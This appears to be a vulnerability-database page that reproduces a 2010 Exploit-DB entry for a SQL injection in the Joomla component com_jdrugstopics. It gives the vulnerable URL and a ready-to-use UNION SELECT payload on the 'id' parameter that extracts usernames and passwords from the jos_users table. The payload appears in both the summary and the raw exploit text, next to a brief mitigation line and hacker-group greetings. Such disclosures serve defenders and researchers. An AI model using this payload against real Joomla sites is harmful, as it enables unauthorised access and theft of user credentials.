Joomla Component com_jdrugstopics SQL Injection Vulnerability

vendor:

N/A

by:

SadHaCkEr

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component com_jdrugstopics SQL Injection Vulnerability

A vulnerability exists in the Joomla Component com_jdrugstopics, which allows an attacker to inject malicious SQL queries via the 'id' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can be done by sending a maliciously crafted HTTP request to the vulnerable application, such as 'http://127.0.0.1/index.php?option=com_jdrugstopics&view=drugsdetails&id=-226 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13 from jos_users--'

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

# Title: Joomla Component com_jdrugstopics SQL Injection Vulnerability 
# Author: SadHaCkEr
# Data  : 2010-04-12
 
[~]######################################### InformatioN #############################################[~]

#AUTHOR:            SadHaCkEr                                                
#Email:             n5s@hotmail.[choose ANY ONE]   IF U lucky  U will Find Me                             
#Website:           http://www.sadx.297m.com/                                
#Forum :            http://v4-team.net/cc                                    
    
[~]#########################################   ExploiT   #############################################[~]
  
[~] Vulnerable  :
  
http://127.0.0.1/index.php?option=com_jdrugstopics&view=drugsdetails&id=[SQL]
  
[~] ExploiT         :
  
-226 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13 from jos_users--
  
[~] Example         :
  
http://127.0.0.1/index.php?option=com_jdrugstopics&view=drugsdetails&id=
-226 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13 from jos_users--

 
   
[~]######################################### ThankS To ... ############################################[~]
  
[~] Special Thanks 2 :
  
RoMaNcYxHaCkEr, Mr.Safa7, Mn7oS & Sniper Code & Red Virus & HCJ & Mr.Wolf & ayaster & All Trayg Member .
  
[~] Trayg Team + V4-Team + SVT Team 
  
[~] GreetZ 2: My LoV3r + My Keyboard
 
[~]#########################################  ./Done   #############################################[~]